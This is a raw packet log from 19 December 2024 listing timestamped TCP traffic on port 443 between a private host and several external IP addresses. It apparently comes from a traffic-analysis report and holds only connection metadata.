                                                                            Dec 19, 2024 15:36:18.950577974 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:18.950613022 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:18.950613022 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:18.950628042 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:18.950669050 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:18.950675011 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:18.960153103 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:18.960207939 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:18.960216045 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:18.972290993 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:18.972357035 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:18.972429037 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:18.972650051 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:18.972661972 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:18.975465059 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:18.975536108 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:18.975548029 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:18.991734028 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:18.991780996 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:18.991854906 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:18.992067099 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:18.992082119 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:19.016921997 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:19.070094109 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.112938881 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:19.112962961 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.120434999 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.143229961 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.143300056 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:19.143332958 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.149583101 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.149636984 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:19.149646997 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.156696081 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.156749964 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:19.156757116 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.161133051 CET49723443192.168.2.17151.101.2.137
                                                                            Dec 19, 2024 15:36:19.165493011 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.165579081 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:19.165595055 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.180891037 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.180947065 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:19.180958033 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.188438892 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.188468933 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.188497066 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:19.188519955 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.188560963 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:19.196419001 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.204375982 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.204446077 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:19.204471111 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.212457895 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.212563992 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:19.212590933 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.220844984 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.220913887 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:19.220936060 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.228965998 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.229022980 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:19.229038954 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.240320921 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.240338087 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.240370035 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.240392923 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.240411997 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.240428925 CET49723443192.168.2.17151.101.2.137
                                                                            Dec 19, 2024 15:36:19.240428925 CET49723443192.168.2.17151.101.2.137
                                                                            Dec 19, 2024 15:36:19.240447044 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.240472078 CET49723443192.168.2.17151.101.2.137
                                                                            Dec 19, 2024 15:36:19.240472078 CET49723443192.168.2.17151.101.2.137
                                                                            Dec 19, 2024 15:36:19.240513086 CET49723443192.168.2.17151.101.2.137
                                                                            Dec 19, 2024 15:36:19.272955894 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:19.334824085 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.336982965 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.337035894 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:19.337057114 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.337110996 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.337157011 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:19.345356941 CET49721443192.168.2.17104.17.25.14
                                                                            Dec 19, 2024 15:36:19.345376968 CET44349721104.17.25.14192.168.2.17
                                                                            Dec 19, 2024 15:36:19.350883961 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.350967884 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.351035118 CET49723443192.168.2.17151.101.2.137
                                                                            Dec 19, 2024 15:36:19.351035118 CET49723443192.168.2.17151.101.2.137
                                                                            Dec 19, 2024 15:36:19.351052999 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.351105928 CET49723443192.168.2.17151.101.2.137
                                                                            Dec 19, 2024 15:36:19.399399996 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.399430037 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.399506092 CET49723443192.168.2.17151.101.2.137
                                                                            Dec 19, 2024 15:36:19.399523020 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.399540901 CET49723443192.168.2.17151.101.2.137
                                                                            Dec 19, 2024 15:36:19.399609089 CET49723443192.168.2.17151.101.2.137
                                                                            Dec 19, 2024 15:36:19.571811914 CET49680443192.168.2.1720.189.173.13
                                                                            Dec 19, 2024 15:36:19.610551119 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.610574007 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.610590935 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.610660076 CET49723443192.168.2.17151.101.2.137
                                                                            Dec 19, 2024 15:36:19.610676050 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.610729933 CET49723443192.168.2.17151.101.2.137
                                                                            Dec 19, 2024 15:36:19.610729933 CET49723443192.168.2.17151.101.2.137
                                                                            Dec 19, 2024 15:36:19.650533915 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.650563955 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.650614023 CET49723443192.168.2.17151.101.2.137
                                                                            Dec 19, 2024 15:36:19.650640965 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.650681973 CET49723443192.168.2.17151.101.2.137
                                                                            Dec 19, 2024 15:36:19.650681973 CET49723443192.168.2.17151.101.2.137
                                                                            Dec 19, 2024 15:36:19.660418987 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.660499096 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.660554886 CET49723443192.168.2.17151.101.2.137
                                                                            Dec 19, 2024 15:36:19.660576105 CET44349723151.101.2.137192.168.2.17
                                                                            Dec 19, 2024 15:36:19.660610914 CET49723443192.168.2.17151.101.2.137
                                                                            Dec 19, 2024 15:36:19.872040987 CET49680443192.168.2.1720.189.173.13
                                                                            Dec 19, 2024 15:36:19.935940981 CET49675443192.168.2.17204.79.197.203
                                                                            Dec 19, 2024 15:36:20.184834003 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.185163021 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.185233116 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.186312914 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.186398029 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.186686039 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.186764002 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.186819077 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.213179111 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.213489056 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.213558912 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.216722965 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.216792107 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.217118025 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.217197895 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.217264891 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.217278004 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.231337070 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.238971949 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.239002943 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.270966053 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.286935091 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.476072073 CET49680443192.168.2.1720.189.173.13
                                                                            Dec 19, 2024 15:36:20.646599054 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.646645069 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.646670103 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.646718025 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.646753073 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.646799088 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.648778915 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.654520988 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.654583931 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.654603958 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.660757065 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.660862923 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.660897017 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.660943031 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.660959005 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.660999060 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.661017895 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.662998915 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.663064957 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.663100004 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.669389963 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.669466019 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.669485092 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.671413898 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.671483994 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.671519041 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.683506012 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.683691978 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.683717966 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.691207886 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.691255093 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.691389084 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.691739082 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.691756964 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.712969065 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.713001966 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.728980064 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.761002064 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.766833067 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.781251907 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.784899950 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.784962893 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.784997940 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.808976889 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.839308977 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.840969086 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.843084097 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.843139887 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.843172073 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.849927902 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.849982023 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.850007057 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.852613926 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.856492043 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.856558084 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.856576920 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.857255936 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.857336998 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.857347965 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.867270947 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.867330074 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.867342949 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.873183012 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.873238087 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.873238087 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.873267889 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.873320103 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.875204086 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.875263929 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.875278950 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.880353928 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.883027077 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.883091927 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.883105993 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.883126020 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.883179903 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.883253098 CET49727443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.883270025 CET44349727104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.885504961 CET49731443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.885544062 CET44349731104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.885941982 CET49731443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.885941982 CET49731443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:20.885971069 CET44349731104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.887970924 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.888052940 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.888072014 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.888103008 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.888290882 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.895797968 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.903490067 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.903762102 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.903800964 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.911297083 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.911365032 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.911400080 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.918772936 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.918876886 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.918896914 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.926418066 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.926486015 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.926517010 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.934005976 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:20.934329987 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.934501886 CET49726443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:20.934520960 CET44349726104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:21.681971073 CET49680443192.168.2.1720.189.173.13
                                                                            Dec 19, 2024 15:36:21.902525902 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:21.903599024 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:21.903620005 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:21.904015064 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:21.905014038 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:21.905086040 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:21.905133009 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:21.947329998 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:21.950020075 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.097296000 CET44349731104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.097615957 CET49731443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.097630024 CET44349731104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.097985983 CET44349731104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.098295927 CET49731443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.098357916 CET44349731104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.098551035 CET49731443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.143325090 CET44349731104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.360532999 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.360582113 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.360615015 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.360642910 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.360666037 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.360676050 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.360691071 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.360760927 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.360760927 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.368935108 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.373868942 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.374006033 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.374022961 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.430032015 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.430047035 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.477117062 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.481453896 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.525006056 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.525026083 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.541568995 CET44349731104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.541651964 CET44349731104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.541789055 CET49731443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.542628050 CET49731443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.542646885 CET44349731104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.545708895 CET49733443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:22.545749903 CET44349733104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.545844078 CET49733443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:22.546125889 CET49733443192.168.2.17104.18.94.41
                                                                            Dec 19, 2024 15:36:22.546138048 CET44349733104.18.94.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.556504965 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.556545973 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.556581020 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.556595087 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.556718111 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.564299107 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.572138071 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.572210073 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.572235107 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.579884052 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.580015898 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.580030918 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.587677002 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.587743998 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.587759018 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.595551014 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.595809937 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.595827103 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.603216887 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.603303909 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.603331089 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.611071110 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.611473083 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.611490965 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.625333071 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.625432014 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.625446081 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.632823944 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.632860899 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.632952929 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.632976055 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.633033991 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.638583899 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.684998035 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.685019016 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.733014107 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.744662046 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.746995926 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.747153044 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.747169018 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.753595114 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.753705025 CET44349729104.18.95.41192.168.2.17
                                                                            Dec 19, 2024 15:36:22.753734112 CET49729443192.168.2.17104.18.95.41
                                                                            Dec 19, 2024 15:36:22.753746986 CET44349729104.18.95.41192.168.2.17
